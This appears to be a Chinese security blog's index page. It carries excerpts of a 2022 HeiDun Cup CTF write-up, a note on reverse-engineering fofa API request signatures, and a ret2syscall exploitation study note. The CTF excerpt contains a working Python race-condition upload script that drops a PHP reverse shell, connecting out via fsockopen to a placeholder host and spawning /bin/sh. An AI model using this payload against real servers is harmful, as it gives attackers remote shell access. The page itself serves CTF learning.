黑盾杯2022线上writeup

Do you secure

dirsearch扫到upload.php

条件竞争

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests

files = {'pic':('ma.php', '''
<?php
$sock = fsockopen("xxx", "9999");
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
''', 'image/png')}

r = requests.post("http://39.104.68.128:24430/upload.php",files=files)
print(r.text)
res = r.text[r.text.find("/upload/"):r.text.find("<br>")]
print(res)
r = requests.get("http://39.104.68.128:24430"+res)
print(r.text)
阅读更多

fofa API 签名逆向

某天准备用自己抓包写的脚本爬一些fofa上的数据时,发现出错了

1
2
3
4
5
{
"code": -9,
"message": "[-9] API校验密匙错",
"data": ""
}

经过抓包,发现请求多了ts sign app_id 三个参数,关键是sign


阅读更多

syscall&ret2syscall学习笔记

使用checksec检查保护

1
2
3
4
5
6
7
checksec rop 
[*] 'rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

丢进IDA查看源码

1
2
3
4
5
6
7
8
9
10
11
12
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[100]; // [esp+1Ch] [ebp-64h] BYREF

setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
puts("No system for you this time !!!");
gets(s);
strncpy(buf2, s, 0x64u);
printf("bye bye ~");
return 0;
}
阅读更多

Hello World

Nya~